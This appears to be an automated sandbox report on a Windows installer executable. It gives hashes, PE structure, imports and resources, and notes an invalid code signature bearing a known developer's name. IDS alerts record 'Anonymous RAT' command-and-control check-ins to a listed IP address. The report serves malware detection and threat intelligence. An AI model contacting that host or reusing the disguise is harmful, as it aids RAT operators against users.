                                                                                                SHA256:38e825894f85ed654a2badb58f28b334597d2662952d9a5ec6918bd8c8b7335a
                                                                                                SHA512:5bf3959f9c0a62ce75cb7317f28d09d662567f3e8f9b067880ae464b0d6124e05f37cdc453f2029950970a002d853dc6b0797cb3627632ef8365b6a04b52e6a0
                                                                                                SSDEEP:49152:xWKtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbD333UKzl:btLutqgwh4NYxtJpkxhGU333X
                                                                                                TLSH:99E54A27F28C713ED06B3A324A3386909837F66179168C6797FC794C8F365942A3E647
                                                                                                File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                Icon Hash:0c1733515131060c
                                                                                                Entrypoint:0x6c6668
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x63ECF219 [Wed Feb 15 14:54:17 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:6
                                                                                                OS Version Minor:1
                                                                                                File Version Major:6
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:6
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8
                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
Not Before:06/05/2023 01:00:00
Not After:06/05/2026 00:59:59
Subject Chain:CN=Johannes Schindelin, O=Johannes Schindelin, S=Nordrhein-Westfalen, C=DE
                                                                                                Version:3
                                                                                                Thumbprint MD5:0BDACC0E75B258864C6FFA046FF1F84A
                                                                                                Thumbprint SHA-1:3EB14A3AEF84B7153E139397F0A49E2FAC662B0E
                                                                                                Thumbprint SHA-256:637C86766A7FB03A8AF3B6D18E2F1183594BD60A75AFC1C36BA9AF46CE2A5A36
                                                                                                Serial:7D467C5AC99420F6A7E2A89ED61472B4
                                                                                                Instruction
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                add esp, FFFFFFF0h
                                                                                                push ebx
                                                                                                push esi
                                                                                                push edi
                                                                                                mov eax, 006BABB4h
                                                                                                call 00007F4D78EBE912h
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov eax, dword ptr [eax+00000188h]
                                                                                                push FFFFFFECh
                                                                                                push eax
                                                                                                call 00007F4D78EC2CADh
                                                                                                mov edx, dword ptr [006CFF3Ch]
                                                                                                mov edx, dword ptr [edx]
                                                                                                mov edx, dword ptr [edx+00000188h]
                                                                                                and eax, FFFFFF7Fh
                                                                                                push eax
                                                                                                push FFFFFFECh
                                                                                                push edx
                                                                                                call 00007F4D78EC2C99h
                                                                                                xor eax, eax
                                                                                                push ebp
                                                                                                push 006C66F9h
                                                                                                push dword ptr fs:[eax]
                                                                                                mov dword ptr fs:[eax], esp
                                                                                                push 00000001h
                                                                                                call 00007F4D78EC1FF4h
                                                                                                call 00007F4D7916863Bh
                                                                                                mov eax, dword ptr [006BA7DCh]
                                                                                                push eax
                                                                                                push 006BA874h
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007F4D79066460h
                                                                                                mov eax, 006B5454h
                                                                                                mov edx, dword ptr [006CFDB4h]
                                                                                                mov dword ptr [edx], eax
                                                                                                call 00007F4D79168682h
                                                                                                xor eax, eax
                                                                                                pop edx
                                                                                                pop ecx
                                                                                                pop ecx
                                                                                                mov dword ptr fs:[eax], edx
                                                                                                jmp 00007F4D791743FBh
                                                                                                jmp 00007F4D78EB7217h
                                                                                                call 00007F4D791683CAh
                                                                                                mov eax, 00000001h
                                                                                                call 00007F4D78EB7D00h
                                                                                                call 00007F4D78EB765Bh
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov edx, 006C688Ch
                                                                                                call 00007F4D79065F2Ah
                                                                                                push 00000005h
                                                                                                mov eax, dword ptr [006CFF3Ch]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov eax, dword ptr [eax+00000188h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2de000 | 0x97 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d9000 | 0x39ba | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e1000 | 0x3ad00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x30dc00 | 0x2d68 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2e0000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2d99f0 | 0x8c4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2dd000 | 0xbde | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2c20c8 | 0x2c2200 | 58be6c93982a266a69bb54d7c353b95b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x2c4000 | 0x2898 | 0x2a00 | 14817d9596460398ce8a10ec41885658 | False | 0.5013950892857143 | data | 6.097600196485659 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2c7000 | 0x9258 | 0x9400 | b6c68a9cc08d787f829bebe13beeebce | False | 0.576198268581081 | data | 6.2228077637398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x2d1000 | 0x790c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2d9000 | 0x39ba | 0x3a00 | 1c7fac207b7708f2d38f3eced48727dc | False | 0.3355334051724138 | data | 5.289106478125697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x2dd000 | 0xbde | 0xc00 | 022cbd8e7ebbfb3df44dfd43f92fa718 | False | 0.3512369791666667 | data | 4.391276161587863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x2de000 | 0x97 | 0x200 | 29372b5d9fa8b5b431a37756aee4c5b7 | False | 0.25 | data | 1.8458344781090077 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2df000 | 0x4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2e0000 | 0x5d | 0x200 | 0e147eb88402eb8a56f168b457309291 | False | 0.189453125 | data | 1.3507743158343073 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2e1000 | 0x3ad00 | 0x3ae00 | 32a06d163194b2d3bf155f7a452b4065 | False | 0.46382779325902335 | data | 6.14802530245256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x2e2320 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x2e2454 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x2e2588 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x2e26bc | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x2e27f0 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x2e2924 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x2e2a58 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x2e2b8c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.04227680680207841
RT_ICON | 0x2e6db4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.07157676348547717
RT_ICON | 0x2e935c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.08794559099437148
RT_ICON | 0x2ea404 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.11891828058573453
RT_ICON | 0x2ee62c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.1578838174273859
RT_ICON | 0x2f0bd4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.010333018422295701
RT_ICON | 0x2f4dfc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.026763485477178422
RT_ICON | 0x2f73a4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.02626641651031895
RT_ICON | 0x2f844c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.15806754221388367
RT_ICON | 0x2f94f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27172131147540984
RT_ICON | 0x2f9e7c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.350177304964539
RT_ICON | 0x2fa2e4 | 0x217 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0205607476635514
RT_ICON | 0x2fa4fc | 0x2ff | PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced | English | United States | 1.014341590612777
RT_ICON | 0x2fa7fc | 0x35c | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | English | United States | 1.0127906976744185
RT_ICON | 0x2fab58 | 0x4ca | PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced | English | United States | 1.0089722675367048
RT_ICON | 0x2fb024 | 0x3fa | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | United States | 1.0108055009823183
RT_ICON | 0x2fb420 | 0x577 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0078627591136526
RT_ICON | 0x2fb998 | 0x5f8 | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | English | United States | 1.007198952879581
RT_ICON | 0x2fbf90 | 0x99c | PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced | English | United States | 1.004471544715447
RT_ICON | 0x2fc92c | 0xaf8 | PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced | English | United States | 1.003917378917379
RT_ICON | 0x2fd424 | 0x75e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0058324496288442
RT_ICON | 0x2fdb84 | 0xaf3 | PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039243667499107
RT_ICON | 0x2fe678 | 0xb2d | PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.0038448095071653
RT_ICON | 0x2ff1a8 | 0xd9f | PNG image data, 84 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.003154574132492
RT_ICON | 0x2fff48 | 0xdc6 | PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031196823596142
RT_ICON | 0x300d10 | 0x12ca | PNG image data, 112 x 112, 8-bit/color RGBA, non-interlaced | English | United States | 1.0022869022869023
RT_ICON | 0x301fdc | 0xd03 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033023116181328
RT_ICON | 0x302ce0 | 0x152c | PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced | English | United States | 1.002029520295203
RT_ICON | 0x30420c | 0x16b5 | PNG image data, 160 x 160, 8-bit/color RGBA, non-interlaced | English | United States | 1.0006881128505074
RT_ICON | 0x3058c4 | 0x1d96 | PNG image data, 168 x 168, 8-bit/color RGBA, non-interlaced | English | United States | 1.0
RT_ICON | 0x30765c | 0x1a2a | PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced | English | United States | 0.9905942072260376
RT_ICON | 0x309088 | 0x2a22 | PNG image data, 216 x 216, 8-bit/color RGBA, non-interlaced | English | United States | 0.998887446690154
RT_ICON | 0x30baac | 0x2c53 | PNG image data, 240 x 240, 8-bit/color RGBA, non-interlaced | English | United States | 0.9956816779765577
RT_ICON | 0x30e700 | 0x191c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.972775357809583
RT_STRING | 0x31001c | 0x210 | data | | | 0.3125
RT_STRING | 0x31022c | 0x440 | data | | | 0.37683823529411764
RT_STRING | 0x31066c | 0x2b4 | data | | | 0.45809248554913296
RT_STRING | 0x310920 | 0x214 | data | | | 0.4605263157894737
RT_STRING | 0x310b34 | 0x3e4 | data | | | 0.3885542168674699
RT_STRING | 0x310f18 | 0x3a0 | data | | | 0.4191810344827586
RT_STRING | 0x3112b8 | 0x1ec | data | | | 0.5609756097560976
RT_STRING | 0x3114a4 | 0xcc | data | | | 0.6666666666666666
RT_STRING | 0x311570 | 0x294 | data | | | 0.4681818181818182
RT_STRING | 0x311804 | 0x3e8 | data | | | 0.372
RT_STRING | 0x311bec | 0x488 | data | | | 0.41293103448275864
RT_STRING | 0x312074 | 0x418 | data | | | 0.28435114503816794
RT_STRING | 0x31248c | 0x370 | data | | | 0.4147727272727273
RT_STRING | 0x3127fc | 0x39c | data | | | 0.41233766233766234
RT_STRING | 0x312b98 | 0x4a4 | data | | | 0.382996632996633
RT_STRING | 0x31303c | 0x384 | data | | | 0.37333333333333335
RT_STRING | 0x3133c0 | 0x454 | data | | | 0.3935018050541516
RT_STRING | 0x313814 | 0x210 | data | | | 0.39015151515151514
RT_STRING | 0x313a24 | 0xbc | data | | | 0.6542553191489362
RT_STRING | 0x313ae0 | 0x100 | data | | | 0.62890625
RT_STRING | 0x313be0 | 0x338 | data | | | 0.4223300970873786
RT_STRING | 0x313f18 | 0x3f0 | data | | | 0.34226190476190477
RT_STRING | 0x314308 | 0x314 | data | | | 0.38578680203045684
RT_STRING | 0x31461c | 0x2f8 | data | | | 0.38026315789473686
RT_RCDATA | 0x314914 | 0x10 | data | | | 1.5
RT_RCDATA | 0x314924 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x316124 | 0xb70 | data | | | 0.5358606557377049
RT_RCDATA | 0x316c94 | 0x147 | Delphi compiled form 'TMainForm' | | | 0.746177370030581
RT_RCDATA | 0x316ddc | 0x480 | Delphi compiled form 'TNewDiskForm' | | | 0.5052083333333334
RT_RCDATA | 0x31725c | 0x400 | Delphi compiled form 'TSelectFolderForm' | | | 0.5087890625
RT_RCDATA | 0x31765c | 0x4b5 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5004149377593361
RT_RCDATA | 0x317b14 | 0x7e3 | Delphi compiled form 'TUninstallProgressForm' | | | 0.40713224368499257
RT_RCDATA | 0x3182f8 | 0x55c | Delphi compiled form 'TUninstSharedFileForm' | | | 0.41690962099125367
RT_RCDATA | 0x318854 | 0x2ac9 | Delphi compiled form 'TWizardForm' | | | 0.19811923673879303
RT_GROUP_CURSOR | 0x31b320 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x31b334 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x31b348 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x31b35c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x31b370 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x31b384 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x31b398 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x31b3ac | 0x148 | data | English | United States | 0.6524390243902439
RT_GROUP_ICON | 0x31b4f4 | 0x30 | data | English | United States | 0.9375
RT_GROUP_ICON | 0x31b524 | 0x22 | data | English | United States | 1.0588235294117647
RT_GROUP_ICON | 0x31b548 | 0x30 | data | English | United States | 0.9375
RT_GROUP_ICON | 0x31b578 | 0x30 | data | English | United States | 0.9583333333333334
RT_VERSION | 0x31b5a8 | 0x514 | data | English | United States | 0.3007692307692308
RT_MANIFEST | 0x31babc | 0x244 | XML 1.0 document, ASCII text, with CRLF line terminators | Chinese | China | 0.453448275862069
                                                                                                DLLImport
                                                                                                mpr.dllWNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
                                                                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                comctl32.dllFlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
                                                                                                shell32.dllSHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
                                                                                                user32.dllCopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, 
DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
                                                                                                version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                oleaut32.dllSafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
                                                                                                advapi32.dllRegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
                                                                                                netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                msvcrt.dllmemcpy
                                                                                                winhttp.dllWinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
                                                                                                kernel32.dllSetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, 
WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
                                                                                                ole32.dllStgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
                                                                                                gdi32.dllArc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
| Name | Ordinal | Address |
|---|---|---|
| TMethodImplementationIntercept | 3 | 0x4b5e78 |
| __dbk_fcall_wrapper | 2 | 0x410a7c |
| dbkFCallWrapperAddr | 1 | 0x6d4640 |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
| Chinese | China |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-10T07:52:36.994962+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.9 | 49931 | 8.217.85.20 | 9091 | TCP |
| 2025-01-10T07:54:11.167711+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.9 | 49984 | 8.217.85.20 | 9092 | TCP |
| 2025-01-10T07:55:51.459265+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.9 | 49986 | 8.217.85.20 | 9092 | TCP |

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 10, 2025 07:52:03.022056103 CET8853497158.217.85.20192.168.2.9
